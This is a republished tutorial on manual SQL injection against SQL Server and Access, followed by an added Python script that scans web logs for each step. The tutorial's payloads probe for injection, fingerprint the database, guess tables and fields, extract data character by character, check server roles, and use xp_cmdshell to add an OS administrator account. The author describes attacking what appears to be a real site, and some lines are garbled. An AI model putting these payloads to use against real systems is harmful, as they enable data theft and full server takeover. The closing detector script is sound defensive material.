Manual injection explanation of Sql Server

2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--

1. Determine whether injection exists.

and 1=1

and 1=2

The method of judging whether injection exists is the same as for any other database: the page renders normally with the true condition and differently (or errors) with the false one.

2. Determine whether the backend is MSSQL.

and user > 0

(In SQL Server, user returns the current database user name as a string; comparing it with an integer forces a type conversion, and the resulting error tells you whether the backend is SQL Server.)

3. Identify the database system

and (select count(*) from sysobjects) > 0  → mssql

and (select count(*) from msysobjects) > 0  → access

4. When the injection parameter is a string

' and [query condition] and ''='

5. When a search parameter is not filtered

' and [query condition] and '25 query condition'

6. Guess the table name

and (select count(*) from [table name]) > 0

This one was painful: there were more than 300 databases, which I could not guess by hand. There is a tool, sqlmap, but here it ran endlessly and then just returned an error. If you fill in the correct table name you can move on to guessing the field, which is the next step. Frankly, I do not understand the Access database well; to learn it I will have to work through examples. These are just some steps and statements that I show you, mainly because this site was so painful. The use of tools will be introduced in later tutorials. To learn this you must first learn the principle; knowing only how to run the injection through a tool is meaningless. Learn the principle, form your own ideas, and then write your own tools. Only then will you have a sense of achievement.

7. Guess the field name

and (select count(field name) from [table name]) > 0

8. Guess the length of the record in the field

and (select top 1 len(field name) from [table name]) > 0

9. (1) Guess the ASCII value of the field (access)

and (select top 1 asc(mid(field name, 1, 1)) from [table name]) > 0

(2) Guess the ASCII value of the field (mssql)

and (select top 1 unicode(substring(field name, 1, 1)) from [table name]) > 0

10. Test the permission structure (mssql); each condition is true only when the current login holds that server role (or database role, for IS_MEMBER)

And 1 = (select IS_SRVROLEMEMBER ('sysadmin'));

And 1 = (select IS_SRVROLEMEMBER ('serveradmin'));

And 1 = (select IS_SRVROLEMEMBER ('setupadmin'));

And 1 = (select IS_SRVROLEMEMBER ('securityadmin'));

And 1 = (select IS_SRVROLEMEMBER ('diskadmin'));

And 1 = (select IS_SRVROLEMEMBER ('bulkadmin'));

And 1 = (select IS_MEMBER ('db_owner'));

11. Add MSSQL and system accounts

Exec master.dbo.sp_addlogin username;--

Exec master.dbo.sp_password null,username,password;--

Exec master.dbo.sp_addsrvrolemember sysadmin username;--

Exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

Exec master.dbo.xp_cmdshell 'net user username password /add';--

Exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
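Seen from the defender's side, every phase of the walkthrough above leaves a recognisable trace in the web server access log. The following Python script is an added example, not code from the original article: it URL-decodes request lines, treats inline comments as whitespace, and reports which step of this walkthrough each request resembles. The request lines, paths and parameter names are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines (path + query string as logged by a web server); not from the article.
SAMPLE_REQUESTS = [
    "/news.asp?id=12",                                                    # benign
    "/news.asp?id=12%20and%201=1",                                        # step 1
    "/news.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)>0",  # step 3
    "/news.asp?id=12%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))",  # step 10
    "/news.asp?id=12;exec%20master.dbo.xp_cmdshell%20'net%20user%20x%20y%20/add'--",  # step 11
    "/search.asp?q=band%20and%20roll",                                    # benign: "and" in a search term
]

# One rule per phase of the walkthrough; the name records which step it corresponds to.
RULES = [
    ("boolean probe (step 1)", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("mssql fingerprint (steps 2-3)", re.compile(r"\buser\s*>\s*0|\bsysobjects\b", re.I)),
    ("table/field guessing (steps 6-9)",
     re.compile(r"select\s+(top\s+\d+\s+)?(count|len|unicode|asc)\s*\(", re.I)),
    ("privilege check (step 10)", re.compile(r"\bIS_(SRVROLE)?MEMBER\s*\(", re.I)),
    ("account/OS command (step 11)",
     re.compile(r"\b(sp_addlogin|sp_password|sp_addsrvrolemember|xp_cmdshell)\b", re.I)),
]


def normalize(request_line):
    """URL-decode twice (catches double encoding), turn inline comments into spaces, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(request_line))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def classify(request_line):
    """Return the names of every rule matching one request line (empty list when none matches)."""
    text = normalize(request_line)
    return [name for name, pattern in RULES if pattern.search(text)]


def scan(lines):
    """Map each suspicious request line to the rule names it triggered; benign lines are omitted."""
    hits = {}
    for line in lines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits


if __name__ == "__main__":
    for line, matched in scan(SAMPLE_REQUESTS).items():
        print(line, "->", ", ".join(matched))
```

The search-term line shows why the boolean rule anchors on the literal `1=1`/`1=2` pattern rather than on the word "and" alone.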
